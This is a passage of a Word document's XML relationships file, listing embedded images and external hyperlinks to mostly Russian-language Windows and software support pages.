Target="media/image39.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/repair-defragment-hard-disks-windows-1.html" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2078.jpg" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530349_upr13.jp" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image200.jpeg"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.jpeg"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image238.png"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image251.png"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image274.jpeg"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=421" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31139" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?linkid=14839" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28141" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image295.png"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image316.jpeg"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image337.jpeg"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image351.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.gif"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.gif"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.apple.com/kb/TS3125?viewlocale=ru_RU" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.jpeg"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.jpeg"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.png"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image249.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image265.jpeg"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-ru/windows/getting-best-display-monitor" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.gif"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31132" TargetMode="External"/><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154.gif"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.jpeg"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.jpeg"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image285.png"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image306.png"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image327.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.gif"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpeg"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2090.jpg" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.jpeg"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.jpeg"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.jpeg"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/show-hidden-files-folders-extensions.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/create-local-administrator-account-windows.html" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpeg"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530340_upr16.jp" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/se/testing/9/9_2.gif" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=217" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.jpeg"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image266.jpeg"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image280.png"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image296.png"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image317.jpeg"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image338.jpeg"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image352.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.gif"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.gif"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2085.jpg" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpeg"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.jpeg"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.jpeg"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/ru-ru/windows/compatibility/CompatCenter/Home?Language=ru-RU" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.gif"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530543_upr1.jp" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/img/empty.gif" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/ru-ru/sysinternals/ee656415" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/ru-ru/windowsserver/bb512919.aspx" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28083" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.jpeg"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image257.jpeg"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image275.png"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image286.png"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image307.png"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image328.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.gif"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2079.jpg" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpeg"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.jpeg"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.jpeg"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/install-current-windows-service-packs-1.html" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/support.html" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image240.png"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.jpeg"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.jpeg"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=90" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28143" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image267.jpeg"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31140" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image297.png"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image318.png"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/goods_store/ebooks/9830" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.teatrbaby.ru/master_zvuk/program" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2074.jpg" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.jpeg"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image339.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://helpx.adobe.com/ru/x-productkb/global/verify-device-drivers-compatible-windows-1.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.gif"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image213.jpeg"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.apple.com/ru_RU/downloads/" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/ru-ru/windows/bb264763.aspx" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.jpeg"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image258.jpeg"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31133" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image287.png"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image308.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.jpeg"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image329.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.gif"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpeg"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.jpeg"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image252.png"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530434_upr7.jp" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530344_upr17.jp" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=101" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image268.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.gif"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.jpeg"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image298.png"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image340.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkId=104690" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.adobe.com/ru/products/photoshop-elements/tech-specs.html" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2086.jpg" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.jpeg"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image231.png"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image255.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.gif"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image276.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.microsoft.com/ru-ru/windowsserver/bb512919.aspx" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image309.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.gif"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image204.jpeg"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image242.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.jpeg"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=31141" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image320.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2075.jpg" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.jpeg"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.jpeg"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image345.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/en-in/windows-10/disk-cleanup-in-windows-10" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/ru-RU/windows7/How-do-I-log-on-as-an-administrator" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image260.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=108" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image289.jpeg"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image331.jpeg"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28144" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.jpeg"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image225.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.gif"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2087.jpg" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530465_upr4.jp" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wininfo.org.ua/uploads/posts/2011-11/1320530312_upr18.jp" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vistablog.com.ua/Windows/view_windows.php?id=113" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image270.jpeg"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image300.png"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image342.jpeg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.microsoft.com/fwlink/?LinkId=151648" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.gif"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://technet.com/ru-ru/" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.jpeg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.gif"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.gif"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.jpeg"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image277.png"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image311.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=28081" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 